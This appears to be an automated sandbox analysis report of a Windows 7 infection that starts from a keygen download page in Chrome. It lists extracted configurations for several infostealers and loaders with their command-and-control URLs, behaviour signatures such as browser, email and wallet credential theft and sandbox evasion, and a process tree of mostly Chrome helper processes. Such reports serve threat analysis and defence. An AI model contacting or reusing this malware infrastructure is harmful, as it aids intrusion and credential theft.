Analysis

  • max time kernel
    311s
  • max time network
    339s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-04-2021 17:01

Errors

Reason
Machine shutdown

General

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

smokeloader

Version

2020

C2

http://al-commandoz.com/upload/

http://antalya-belek.com/upload/

http://luxurysv.com/upload/

http://massagespijkenisse.com/upload/

http://rexgorellhondaevent.com/upload/

rc4.i32
rc4.i32

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 50 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 41 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 12 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:884
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:1464
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/0f26cf244e1108834498.html
      1⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1100
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fefaa34f50,0x7fefaa34f60,0x7fefaa34f70
        2⤵
          PID:1144
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1108 /prefetch:2
          2⤵
            PID:1688
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1396 /prefetch:8
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1568
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1696 /prefetch:8
            2⤵
              PID:1536
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2040 /prefetch:1
              2⤵
                PID:724
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2056 /prefetch:1
                2⤵
                  PID:652
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2416 /prefetch:1
                  2⤵
                    PID:1168
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2428 /prefetch:1
                    2⤵
                      PID:1848
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1536 /prefetch:1
                      2⤵
                        PID:1700
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2440 /prefetch:1
                        2⤵
                          PID:1716
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3572 /prefetch:8
                          2⤵
                            PID:2280
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3500 /prefetch:2
                            2⤵
                              PID:2408
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5320 /prefetch:8
                              2⤵
                                PID:2656
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5424 /prefetch:8
                                2⤵
                                  PID:2712
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5448 /prefetch:8
                                  2⤵
                                    PID:2760
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5528 /prefetch:8
                                    2⤵
                                      PID:2808
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5536 /prefetch:8
                                      2⤵
                                        PID:2856
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8
                                        2⤵
                                          PID:2904
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3000 /prefetch:8
                                          2⤵
                                            PID:2952
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
                                            2⤵
                                              PID:3000
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:8
                                              2⤵
                                                PID:3048
                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                2⤵
                                                  PID:3068
                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13f41a890,0x13f41a8a0,0x13f41a8b0
                                                    3⤵
                                                      PID:2264
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4840 /prefetch:8
                                                    2⤵
                                                      PID:2360
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 /prefetch:8
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2672
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4828 /prefetch:8
                                                      2⤵
                                                        PID:2728
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:8
                                                        2⤵
                                                          PID:2756
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4796 /prefetch:8
                                                          2⤵
                                                            PID:2792
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4780 /prefetch:8
                                                            2⤵
                                                              PID:2804
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4800 /prefetch:8
                                                              2⤵
                                                                PID:2832
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4684 /prefetch:8
                                                                2⤵
                                                                  PID:2896
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4708 /prefetch:8
                                                                  2⤵
                                                                    PID:1888
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4732 /prefetch:8
                                                                    2⤵
                                                                      PID:2084
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:8
                                                                      2⤵
                                                                        PID:2128
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4352 /prefetch:8
                                                                        2⤵
                                                                          PID:2172
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
                                                                          2⤵
                                                                            PID:2060
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3352 /prefetch:8
                                                                            2⤵
                                                                              PID:2904
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3700 /prefetch:8
                                                                              2⤵
                                                                                PID:2988
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1308 /prefetch:8
                                                                                2⤵
                                                                                  PID:3032
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4636 /prefetch:8
                                                                                  2⤵
                                                                                    PID:3004
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
                                                                                    2⤵
                                                                                      PID:3044
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
                                                                                      2⤵
                                                                                        PID:3056
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3120 /prefetch:8
                                                                                        2⤵
                                                                                          PID:1364
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4148 /prefetch:8
                                                                                          2⤵
                                                                                            PID:1716
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5532 /prefetch:8
                                                                                            2⤵
                                                                                              PID:108
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4808 /prefetch:8
                                                                                              2⤵
                                                                                                PID:1256
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:1576
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4468 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:2800
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4788 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:2824
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4344 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:2864
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2452 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:2132
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4452 /prefetch:8
                                                                                                          2⤵
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:1124
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3048 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:3024
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:2184
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4368 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:1740
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:3028
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5272 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:908
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:2692
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5452 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:2964
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1104,4164280000620910039,18016170210908909504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3032 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:2044
                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x5b4
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2232
